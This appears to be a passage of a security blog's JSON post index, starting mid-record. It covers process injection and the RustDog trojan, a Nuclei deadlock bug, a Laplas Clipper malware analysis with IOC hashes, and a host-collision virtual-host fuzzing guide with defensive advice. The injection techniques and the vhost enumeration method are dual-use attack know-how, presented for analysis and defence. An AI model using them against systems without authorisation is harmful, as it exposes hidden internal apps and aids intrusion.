2024_03_26, reviewed_at 2025_07_14; target:src_ip;) ","permalink":"https://blacksugar.top/posts/lumma_stealer/","summary":"\u003cp\u003eLUMMA offers Malware-as-a-Service (MaaS) for information-stealing trojans,  enabling its customers to directly build trojans on the platform. The  MaaS platform also supports parsing, extracting, and retrieving stolen  data such as databases and text files, significantly lowering the  barrier to entry for data theft attacks. The LUMMA technical development team continues to refine the trojan\u0026rsquo;s data  exfiltration capabilities, which currently include stealing browser  data, cryptocurrency keys, KEEPASS password databases, and more. To  effectively evade antivirus solutions, LUMMA does not employ VMProtect  (VMP) packing technology but instead utilizes a string obfuscation  method referred to by the technical team as the \u0026ldquo;MORPHER\u0026rdquo; solution.\u003c/p\u003e","title":"「君迁」Comprehensive Malware Analysis of a Lumma Stealer Sample Delivered via Malicious SCR Droppe"},{"content":"0x00 Opening I didn\u0026rsquo;t set out to write about process injection. I was knee-deep in a reverse-engineering task when a sample named RustDog kept pulling me back — not because it was flashy, but because it quietly did what many modern trojans do: slip code into other processes and hide in plain sight. Over a few late-night debugging sessions I tracked how it reached into legitimate processes and manipulated them. That little detour turned into a full mini-project: I decided to map out common injection techniques, why many defenses miss them, and how the RustDog example ties everything together.\n0x01 why this matters Process injection is one of those techniques that sits at the intersection of elegance and menace. From a defender\u0026rsquo;s point of view it\u0026rsquo;s elegant because it lets attackers reuse trusted processes (so their code looks \u0026ldquo;normal\u0026rdquo; to casual inspection). From a defender\u0026rsquo;s point of view it’s annoying because the injected code can:\nrun inside another process\u0026rsquo;s address space (so file-based scanners may miss it), hide its module metadata or erase PE headers (making discovery harder), and use legitimate Windows APIs and mechanisms (APCs, remote threads, message hooks, IME mechanisms) to execute without obvious signs. Because of that, simple heuristics (e.g., \u0026ldquo;scan the PEB for unexpected modules\u0026rdquo;) often get bypassed. In some cases attackers will strip or unlink their modules; in others they\u0026rsquo;ll avoid modules altogether and run raw shellcode in memory. That’s why I wanted to step back and write a concise, practical summary — one that mixes intuition, concrete techniques, and the real RustDog case I analyzed.\n0x02 Process Injection Mechanism Other than injection forms like DLL and shellcode, according to the mechanism of injection exploitation, we can broadly categorize them into two types: injection methods based on cross-process access, injection methods based on system mechanisms.\n2.1 Injection Methods Based on Cross-Process Access Process tampering typically achieves code injection and modification through module injection, which is the core technique used by Trojans in this category. The attack process involves first injecting a malicious DLL into the target process. The DLL\u0026rsquo;s entry function executes the malicious code. Then, malicious functionalities are implemented through methods such as hooking Windows API, setting timers to monitor process states, and creating child threads.\nUsually, there are three common approaches:\nRemote Thread Injection: Creating a new thread in the target process. Thread Hijacking: Utilizing an existing thread in the target process. APC (Asynchronous Procedure Call) Injection: Leveraging the APC feature in threads. 2.1.1 Remote Thread Injection This method involves creating a remote thread in the target process and utilizing this thread to perform the necessary operations for loading the DLL\n2.1.2 Thread Hijacking This method first suspends a specific thread within the game process, then modifies the instruction pointer (EIP or RIP) of that thread. This pointer is directed towards a section of memory allocated by the malicious program within the game process. In this area, a piece of code (referred to as shellcode) is written, which achieves module injection.\n2.1.3 APC (Asynchronous Procedure Call) Injection \u0026ldquo;APC\u0026rdquo; is an abbreviation for Asynchronous Procedure Call, which is a thread-based callback mechanism provided by Windows.\nAPC Injection Principle:\nWhen a thread within an executable reaches functions like SleepEx, SignalObjectAndWait, WaitForSingleObjectEx, WaitForMultipleObjectsEx, or MsgWaitForMultipleObjectsEx, the system generates a software interrupt. When the thread is awakened again, it first executes the functions registered in the APC queue. Using the QueueUserAPC() API, a function pointer can be inserted into the thread\u0026rsquo;s APC queue during the software interrupt. If we insert a pointer to the, LoadLibrary() function, it can achieve the goal of DLL injection. 2.2 Injection methods based on system mechanisms These methods utilize certain special system mechanisms existing in the Windows operating system to achieve injection.\nCommon methods include two types:\nHooking Windows Messages Input Method Injection 2.2.1 Hooking Windows Messages This method utilizes the SetWindowsHookEx function provided by Windows to register a global message hook for a specific type of message event. When a thread in the system triggers the specified message event, Windows automatically calls the Hook function specified during registration. If this function resides in a DLL, Windows first injects the DLL into the process where the message event is triggered, and then calls the Hook function.\n2.2.2 Input Method Injection On the Windows platform, when switching input methods, the Input Method Manager imm32.dll loads the Input Method Editor (IME) module. This creates the necessary conditions for input method injection. The IME file, essentially a special DLL stored in the C:\\WINDOWS\\system32 directory, allows us to utilize this feature. Inside the IME file, we can use the LoadLibrary() function to inject the desired DLL file. When switching to the maliciously crafted input method, the input method injection is execute.\n0x03 Process Injection Protection Based on the previous analysis of process injection techniques, a defensive approach centered on Windows kernel events is proposed. The system monitors kernel-level events to detect and prevent attempts to modify a target process\u0026rsquo;s memory or to load unauthorized modules, preserving process integrity. In addition, lightweight anti-injection DLLs are injected into system processes to provide an application-layer safeguard. These DLLs use API hooks to monitor mouse and keyboard simulation functions and block simulated input from other processes. Together, kernel-event monitoring and system-wide DLL guards create a layered defense against a range of injection techniques.\n3.1 Defense Against Cross-Process Access Injection Cross-process injection typically follows three steps: allocate memory in the target process, write payload data into that memory, and create a thread to execute the payload. Common Windows APIs used for this sequence include VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, all of which require a handle to the target process with appropriate permissions. Detecting and intercepting illegitimate handle creation and suspicious access patterns prevents the cross-process access chain from completing, thereby blocking this class of module injection.\n3.2 Defending Against System Mechanism Injection Injection methods utilizing Windows system mechanisms do not require acquiring process handles. To defend against such injections, monitoring the loading events of modules at the kernel level can be implemented to check whether unauthorized modules have been loaded into the target process. Utilizing blacklists, whitelists, and signature verification can ensure the validity of DLLs.\n0x04 Process Injection Case Study Process injection has become an essential evasion technique for many modern trojans. Traditional antivirus software often struggles to detect these trojans effectively. We recently analyzed a trojan targeting financial personnel, which employed numerous anti-detection measures to bypass antivirus scans. However, leveraging the methods described earlier, we were still able to detect it.\n4.1 RustDog Phishing Trojan RustDog is a phishing Trojan that targeted finance professionals in the first half of 2023. It operated by sending phishing emails to users, luring them to a fake website where the Trojan was downloaded. The main functionality of this Trojan was to modify SunLogin(A popular remote control tool widely used in China) configuration files, enabling remote control through SunLogin and thereby stealing sensitive user information.\nOnce the Trojan is activated, it undergoes a series of checks and initializations. The Trojan attempts to receive payload content sent from the server and loads and executes it. The executed payload decrypts a DLL file in memory, which is a fully functional remote control Trojan. If the program is started with a single parameter or includes the string -Puppet, it injects the payload into the notepad.exe or explorer.exe process.\nIn the final step, the Trojan replaces the configuration file of SunLogin, enabling remote control over the user\u0026rsquo;s system. Through reverse analysis of this Trojan, we observed its use of APC injection, which involves illegal handle permissions across processes. Therefore, by monitoring common processes within the system, we can promptly detect such injection behaviors and identify potential attack incidents.\n","permalink":"https://blacksugar.top/posts/process_injection/","summary":"\u003ch2 id=\"0x00-opening\"\u003e0x00 Opening\u003c/h2\u003e\n\u003cp\u003eI didn\u0026rsquo;t set out to write about process injection. I was knee-deep in a reverse-engineering task when a sample named \u003cstrong\u003eRustDog\u003c/strong\u003e kept pulling me back — not because it was flashy, but because it quietly did what many modern trojans do: slip code into other processes and hide in plain sight. Over a few late-night debugging sessions I tracked how it reached into legitimate processes and manipulated them. That little detour turned into a full mini-project: I decided to map out common injection techniques, why many defenses miss them, and how the RustDog example ties everything together.\u003c/p\u003e","title":"「古度」Analysis of RustDog and Process Injection"},{"content":"0x00 What\u0026rsquo;s UP Nuclei is one of my favorite security tools. But recently I ran into a strange and reproducible bug while using ProjectDiscovery’s Nuclei. A workflow that normally runs fine suddenly froze forever—but only under a very specific condition.\nBefore diving into the issue, here’s a quick recap of the command we’re dealing with:\nnuclei -w test-workflow.yaml -u https://example.com -c 1 📝 What this command does -w test-workflow.yaml — loads a workflow file that orchestrates multiple templates -u https://example.com — specifies the target -c 1 — sets concurrency (number of parallel template executions) to 1 Workflows allow Nuclei to chain multiple templates together, making scanning smarter and more automated. However, using -c 1 with workflows used to trigger a curious deadlock, which is exactly what this blog post explores.\nAll , now let\u0026rsquo;s go back to the bug:\nNuclei version: v2.9.6\nCurrent Behavior: the nuclei get stuck running certain workflows when the concurrency set to 1\nresults in:\nNo output No error The process never exits Expected Behavior: the worklflow works fine just like when the concurrency set to 2\n0x01 🔍 Root Cause: A Deadlock Inside SizedWaitGroup After digging into the source code, the issue turns out to be a classic deadlock caused by re-using the same SizedWaitGroup instance in nested workflow steps.\nhttps://github.com/projectdiscovery/nuclei/blob/v2.9.6/v2/pkg/core/workflow_execute.go#L28-L38\nswg := sizedwaitgroup.New(w.Options.Options.TemplateThreads) for _, template := range w.Workflows { swg.Add() func(template *workflows.WorkflowTemplate) { if err := e.runWorkflowStep(template, ctxArgs, results, \u0026amp;swg, w); err != nil { gologger.Warning().Msgf(workflowStepExecutionError, template.Template, err) } swg.Done() }(template) } swg.Wait() 1. Outer Workflow Loop Holds the Only Slot Nuclei creates a SizedWaitGroup based on the concurrency value:\nswg := sizedwaitgroup.New(w.Options.Options.TemplateThreads) So when I run -c 1, the wait group capacity is literally:\ncapacity = 1 Inside the main workflow loop, Nuclei calls:\nswg.Add() This occupies the only available slot in the wait group.\n2. Inner Workflow Step Also Calls swg.Add() Later, inside runWorkflowStep(), Nuclei processes subtemplates:\nswg.Add() go func() { e.runWorkflowStep(...) swg.Done() }() But since the outer loop already consumed the only concurrency slot, the inner swg.Add():\nHas no remaining capacity Blocks forever Prevents both goroutines from reaching .Done() Causing a permanent deadlock Why it works when -c 2 Capacity = 2 Outer workflow takes 1 slot → 1 slot still free Inner workflow can Add() safely → No deadlock\nSo this is a perfect storm of:\nNested workflows Shared SizedWaitGroup instance Concurrency limit = 1 0x02 📌 What Makes This Bug Subtle This bug is easy to miss because:\nIt only appears in workflows with nested steps It only triggers at concurrency = 1 Nuclei does not produce errors or logs indicating a deadlock It appears random unless concurrency is inspected carefully In real-world scanning pipelines, especially when limiting concurrency to reduce load, this could cause a workflow to silently hang.\n0x03 ✔️ Upstream Resolution I reported this bug, and the issue was acknowledged by the maintainers and categorized as a workflow-related bug. It was later scheduled under the milestone v2.9.9 and marked as completed.\nTo avoid the deadlock that happens when TemplateThreads = 1, the Nuclei team added a simple but effective workaround: automatically bump concurrency from 1 → 2.\nPatch Code (from workflow_execute.go) https://github.com/projectdiscovery/nuclei/blob/v2.9.9/v2/pkg/core/workflow_execute.go#L28-L49\ntemplateThreads := w.Options.Options.TemplateThreads if templateThreads == 1 { templateThreads++ } swg := sizedwaitgroup.New(templateThreads) for _, template := range w.Workflows { swg.Add() func(template *workflows.WorkflowTemplate) { defer swg.Done() if err := e.runWorkflowStep(template, ctxArgs, results, \u0026amp;swg, w); err != nil { gologger.Warning().Msgf(workflowStepExecutionError, template.Template, err) } }(template) } swg.Wait() return results.Load() Why This Fix Works The root cause of the deadlock is that:\nWith concurrency = 1 The outer workflow loop consumes the only slot in the SizedWaitGroup Then inner workflow steps attempt to call swg.Add() again → but there is no remaining capacity → Add() blocks forever → entire workflow hangs By bumping concurrency to 2:\nOuter loop uses slot #1 Inner workflow still has slot #2 No deadlock occurs ","permalink":"https://blacksugar.top/posts/deadlock_in_nuclei/","summary":"\u003ch2 id=\"0x00-whats-up\"\u003e0x00 What\u0026rsquo;s UP\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eNuclei is one of my favorite security tools.\u003c/strong\u003e But recently I ran into a strange and reproducible bug while using \u003cstrong\u003eProjectDiscovery’s Nuclei\u003c/strong\u003e.\nA workflow that normally runs fine suddenly \u003cstrong\u003efroze forever\u003c/strong\u003e—but only under a very specific condition.\u003c/p\u003e\n\u003cp\u003eBefore diving into the issue, here’s a quick recap of the command we’re dealing with:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003enuclei -w test-workflow.yaml -u https://example.com -c 1\n\u003c/code\u003e\u003c/pre\u003e\u003ch3 id=\"-what-this-command-does\"\u003e📝 What this command does\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e-w test-workflow.yaml\u003c/code\u003e — loads a workflow file that orchestrates multiple templates\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e-u https://example.com\u003c/code\u003e — specifies the target\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e-c 1\u003c/code\u003e — sets concurrency (number of parallel template executions) to \u003cstrong\u003e1\u003c/strong\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eWorkflows allow Nuclei to chain multiple templates together, making scanning smarter and more automated. However, using \u003ccode\u003e-c 1\u003c/code\u003e with workflows used to trigger a curious deadlock, which is exactly what this blog post explores.\u003c/p\u003e","title":"「古度」Debugging a Hidden Deadlock in Nuclei Workflows When Concurrency = 1"},{"content":"0x00 Introduction LAPLAS CLIPPER, an information-stealing trojan offered as a subscription-based MaaS (Malware-as-a-Service) cloud service (the service websites are shown below). Users can build trojan binaries directly on the platform and customize callback settings such as proxy servers and persistence configuration item names. The trojan continuously monitors the victim\u0026rsquo;s clipboard, and if the clipboard content matches a wallet-address regular expression it replaces it with the attacker\u0026rsquo;s wallet address, enabling fraudulent transfers and greatly lowering the technical barrier for attacks.\n0x01 The version of Laplas Clipper Since October 2022, the LAPLAS technical team has successively released multiple versions of Trojan programs in .Net, C++, and Go.\nBecause LAPLAS trojans use the callback domain clipper.guru, we searched VirusTotal for samples to analyze. This article focuses primarily on the .NET and Go variants\n0x02 .NET Using the DIE tool to analyze the sample, we found no packer or obfuscation — the trojan appears to be an unpacked binary.\nModule analysis Decompilation with dotPeek reveals the main components of the trojan: clipboard manipulation, C2/API communication for data exchange, and startup persistence mechanisms, etc.\nThe API/C2 request code (see below) is responsible for obtaining wallet addresses, sending the implant\u0026rsquo;s status, and fetching wallet regex patterns used for scraping/validation\nThe clipboard-handling code (below) covers three core actions — read, write, and clear operations on the system clipboard.\nConfiguration parameters include the command-and-control domain (clipper.guru), the malware’s executable name, the Windows startup/persistence registry or scheduled-task name, and the LAPLAS cloud platform API token.\nPersistence and execution flow At startup, the malware creates a mutex for single-instance enforcement. It then checks for the existence of its persistence mechanism (autostart entry) and, if properly configured, continues running.\nThe implant queries an API for wallet-address regex patterns and sends heartbeat/online status. It periodically updates the regex set and status, monitors the system clipboard, applies regex-based detection of cryptocurrency addresses, and on a positive match overwrites the clipboard with an attacker-controlled address (address-replacement fraud).\nPersistence: the implant sets up a Windows scheduled task using schtasks to achieve autostart.\n0x03 Go An analysis with the DIE tool of the trojan binary shows it was written in Go and is not packed.\nInspecting the functions in the Go trojan shows they are basically similar to those in the .NET version.\nThe malware stores its configuration in encrypted form. On launch, the binary immediately decrypts the configuration blob before continuing, see code below.\nThe malware verifies whether its persistence/autostart entry is present.\nThe malware periodically sends heartbeat/status reports and refreshes the regular expressions used to identify wallet addresses, among other functions.\nThe malware monitors the system clipboard and, when a clipboard entry matches a wallet address regex, overwrites it with an attacker controlled address to facilitate scam transactions.\nThe malware verifies whether its persistence entry exists; if absent, it copies itself to the target location and registers a persistence mechanism (autostart).\n0x04 Summary LAPLAS Clipper is a clipboard-hijacking malware family (variants in .NET, Go, etc) that uses the C2 domain clipper.guru; it fetches regular expressions for cryptocurrency addresses and heartbeats from an API, decrypts an encrypted configuration at startup, enforces single-instance execution via a mutex, monitors the clipboard and replaces matched crypto addresses with attacker-controlled addresses to facilitate fraud, and ensures persistence by copying itself and registering a Windows scheduled task (schtasks); analyzed Go samples show no packer/obfuscation.\n0x05 IOC sha256 .NET Version 025bec496d71b1d17d023e04f25a5df0f3538308a5d639007a1e7db41c6d91e6 GO Version 04ac8df80dd9829697566bedb82cd689d0c90cffb0c6219a1bfa38dc86dc59c9 ","permalink":"https://blacksugar.top/posts/laplas_clipper/","summary":"\u003ch2 id=\"0x00-introduction\"\u003e0x00 Introduction\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eLAPLAS CLIPPER\u003c/strong\u003e, an information-stealing trojan offered as a subscription-based MaaS (Malware-as-a-Service) cloud service (the service websites are shown below). Users can build trojan binaries directly on the platform and customize callback settings such as proxy servers and persistence configuration item names. The trojan continuously monitors the victim\u0026rsquo;s clipboard, and if the clipboard content matches a wallet-address regular expression it replaces it with the attacker\u0026rsquo;s wallet address, enabling fraudulent transfers and greatly lowering the technical barrier for attacks.\u003c/p\u003e","title":"「松子」LAPLAS CLIPPER: A Brief Analysis of the Trojan"},{"content":" This post is a review of my notes on host collision (virtual host enumeration) – what it is, how it works, and why it still matters in nowadays.\nIt also doubles as a “design doc” for my tool HostCollision.\n0x00 Motivation: When ports are open but the site is “missing” Typical recon story:\nYou do IP/port scanning, find lots of 80/443/8080/8443. You open them in a browser full of hope. You get 403, 404, “Welcome to nginx”, Tomcat default page, random WAF splash screens… Clearly, something is running there, but not necessarily the app you’re after.\nIn modern environments, this is normal:\nFronted by load balancers / reverse proxies / CDNs / WAFs. Multiple virtual hosts (vhosts) on the same IP. Internal or “hidden” apps routed only when the right Host header appears. This is where host collision comes in:\nwe abuse how HTTP/1.1 routes requests by Host to discover additional sites behind a single IP.\n0x01 Quick recap: Host header and virtual hosts 1.1 Host header in HTTP/1.1 In HTTP/1.1, Host is a mandatory header:\nGET / HTTP/1.1 Host: example.com The TCP connection (IP + port) says “which machine did I connect to”, the Host header says “which website on this machine do I want”.\n1.2 How web servers use Host Web servers (Nginx/Apache/etc.) commonly use name-based virtual hosts:\nserver { listen 80; server_name www.aaa.com; # ... } server { listen 80; server_name www.bbb.com; # ... } server { listen 80 default_server; server_name _; # default / fallback vhost } Routing logic is roughly:\nAccept connection on IP:80. Parse HTTP request → read Host: \u0026lt;something\u0026gt;. Match server_name / vhost definition. If no match → send traffic to a default vhost (often a boring page). If admins deploy internal apps (e.g. intranet.example.com, admin.example.com) on the same front-end but don’t expose them via public DNS, they may still be reachable as long as the reverse proxy sees the right Host header.\nThat’s the attack surface host collision abuses.\n0x02 So what exactly is “host collision”? 2.1 One-sentence definition Host collision / virtual host fuzzing is sending HTTP requests to a fixed IP while fuzzing the Host header, in order to discover additional vhosts routed through the same front-end.\nConcretely:\nURL: http://\u0026lt;IP\u0026gt;/ Header: Host: \u0026lt;some-domain\u0026gt; Instead of doing “DNS brute force” (ask DNS for foo.example.com, bar.example.com…), you:\nTalk directly to the web server / reverse proxy by IP. Change only the Host header over HTTP. Observe which combinations produce meaningful responses. You maintain two buckets:\nIP bucket: ip.txt Host bucket (domain/subdomain dictionary): host.txt Process:\nfor each ip in ip_list: for each host in host_list: send HTTP request: URL = http://ip/ Host = host record status / length / body fingerprint / similarity If 10.0.0.5 + Host: intranet.example.com suddenly returns a valid app while all other combos return error/default pages, then:\n10.0.0.5 likely fronts the vhost intranet.example.com. This vhost may be “internal-only” from a DNS perspective, but the HTTP gateway still routes to it. 0x03 Normal flow vs. host collision flow 3.1 Normal user flow When a normal user visits https://app.example.com/:\nBrowser resolves app.example.com via DNS. Gets IP, say 1.2.3.4. Connects to 1.2.3.4:443, does TLS handshake (SNI=app.example.com). Sends HTTP request with Host: app.example.com. Load balancer / reverse proxy routes to the correct backend based on SNI / Host. 3.2 What host collision changes Host collision decouples DNS from HTTP routing:\nWe no longer care what DNS says. We only need an IP that accepts HTTP/HTTPS. We send Host values that the operator did not intend to expose externally. Example:\nGET / HTTP/1.1 Host: admin.internal.example.com sent directly to 203.0.113.10 (a public IP). If the front-end is misconfigured, it might route this to the internal admin app even though admin.internal.example.com doesn’t resolve in public DNS.\nIn other words:\nDNS says “no such host”. HTTP routing says “sure, come in”.\nThat gap is exactly what we exploit.\n0x04 Why this is a real security issue In many real environments:\nA single IP / load balancer fronts dozens or hundreds of apps. Some apps are meant to be public; some are “internal” or “restricted”. “Internal” is often implemented by: Only putting the hostname in internal DNS. Maybe firewalling some sources, but not always consistently. If all of these apps are still routed based on Host alone, then:\nAnyone who can reach the IP and guess the hostname can hit the app. No public DNS record ≠ no exposure. Certificate enumeration and DNS scraping may miss those hosts. Host collision can reveal a massive number of extra targets in a single IP range. wya.pl For a pentester, missing this means:\nYou see only one boring site behind an IP. Meanwhile there might be tens or hundreds of APIs, admin panels, debug instances behind the same IP, all accessible with the right 0x05 A practical workflow: from raw IPs to usable hits 5.1 Collect candidate IPs Typical sources:\nAsset inventory (if you’re internal). External: Shodan, FOFA, Censys, etc. Your own masscan / nmap sweeps. From these, keep IPs where:\n80/443/8080/8443/etc. are open. Direct IP access returns: Default pages (Welcome to nginx, Apache test page, etc.). WAF/403/404. Very generic responses. These are strong candidates for “reverse proxies with multiple vhosts”.\n5.2 Build IP and Host dictionaries ip.txt – one IP per line (filtered candidates). host.txt – hostnames to try, from: Subdomain enumeration (passive + brute-force). Wordlists (SecLists etc.). Historical data, internal naming conventions, leaked configs. thehacker.recipes+1 5.3 Run the host collision Tool-agnostic logic:\nFor each (ip, host) pair: URL: http://ip/ Header: Host: host Collect: Status code Response size Response body (for hashing / similarity) Duration (optional, for debugging) This is what tools like ffuf/gobuster/wfuzz do in vhost mode as well. thehacker.recipes+1\n5.4 Similarity filtering: kill the noise Raw results are noisy:\nDefault error pages WAF block pages Generic “site not configured” responses Common trick:\nFor each IP, pick a baseline response (often the first valid-looking 2xx/3xx). For every other (ip, host) response: Compute similarity score vs. baseline (e.g. shingle/Jaccard, fuzzy hash…). If similarity is too high, treat it as “same generic page”. If similarity is low, mark it as interesting. This is the core idea behind tools like VhostFinder: virtual hosts with distinct content will diverge from the baseline.\n5.5 Triage and follow-up What you end up with after filtering:\nA relatively small set of (ip, host) combos: 2xx/3xx responses Content significantly different from baseline Titles that look like login pages, admin consoles, dashboards, APIs, etc. Next steps:\nAdd ip host mappings to /etc/hosts (for convenience). Browse these hosts normally. Combine with directory brute forcing, tech fingerprinting, and standard web testing. 0x06 Host collision vs. DNS brute-forcing They’re related, but not the same thing:\nDNS brute force Ask DNS for foo.example.com, bar.example.com, … If there’s a record, you get an IP. No record? DNS says “NXDOMAIN”. Host collision / vhost fuzzing You already have an IP. You send HTTP requests to that IP with different Host headers. You observe differences in HTTP responses. Key difference:\nDNS brute forcing enumerates published names (what DNS wants you to know). Host collision enumerates routable names (what the HTTP stack will actually route). Sometimes there’s a perfect overlap. In interesting cases, there isn’t – which is exactly why host collision is valuable.\n0x07 Defensive notes: how not to get “collided” From the blue-team perspective, host collision points to two underlying issues:\nOver-trusting Host without proper scoping. Letting internal vhosts ride on public-facing front-ends. Some practical mitigations:\nSeparate public and internal vhosts Don’t put admin/dev/internal vhosts on the same public IP / listener as external apps. At least restrict them at the network level (VPN-only, office IPs, etc.). Tight default / fallback behavior For unknown Host, return a minimal error (or drop). Don’t route to real apps as fallback. Avoid verbose default pages leaking server info. Host header whitelisting Front-end/WAF only allows known, intended hostnames. Everything else → fixed error / drop. Regular self-scanning From the Internet, run your own vhost fuzzing against your IP ranges. Compare caught vhosts vs. intended DNS records. If something is routable but not in DNS, decide if it really should be reachable. 0x08 Summary Host collision is one of those techniques that:\nIs conceptually simple; Leverages a very old piece of the web stack (HTTP/1.1 Host); Still reveals surprising amounts of attack surface in modern, virtual-host-heavy environments. The core ideas to remember:\nIP decides who you talk to; Host decides who you *ask* for. DNS is one way to map names to IPs, but HTTP routing doesn’t depend on public DNS being “truthful”. A single IP / load balancer can hide hundreds of apps; if you don’t check vhosts, you might miss most of your scope. Whether you use my HostCollision or any other tool, having vhost enumeration in your recon playbook is absolutely worth it – both for offense (finding hidden assets) and for defense (discovering accidental exposures before someone else does).\n","permalink":"https://blacksugar.top/posts/host_collision/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis post is a review of my notes on \u003cem\u003ehost collision\u003c/em\u003e (virtual host enumeration) – what it is, how it works, and why it still matters in nowadays.\u003cbr\u003e\nIt also doubles as a “design doc” for my tool \u003cstrong\u003e\u003ca href=\"https://github.com/black5ugar/HostCollision\"\u003eHostCollision\u003c/a\u003e\u003c/strong\u003e.\u003c/p\u003e\u003c/blockquote\u003e\n\u003ch2 id=\"0x00-motivation-when-ports-are-open-but-the-site-is-missing\"\u003e0x00 Motivation: When ports are open but the site is “missing”\u003c/h2\u003e\n\u003cp\u003eTypical recon story:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eYou do IP/port scanning, find lots of 80/443/8080/8443.\u003c/li\u003e\n\u003cli\u003eYou open them in a browser full of hope.\u003c/li\u003e\n\u003cli\u003eYou get 403, 404, “Welcome to nginx”, Tomcat default page, random WAF splash screens…\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eClearly, \u003cem\u003esomething\u003c/em\u003e is running there, but not necessarily the app you’re after.\u003c/p\u003e","title":"「松子」Host Collision 101: Finding Hidden Assets Behind a Single IP"}]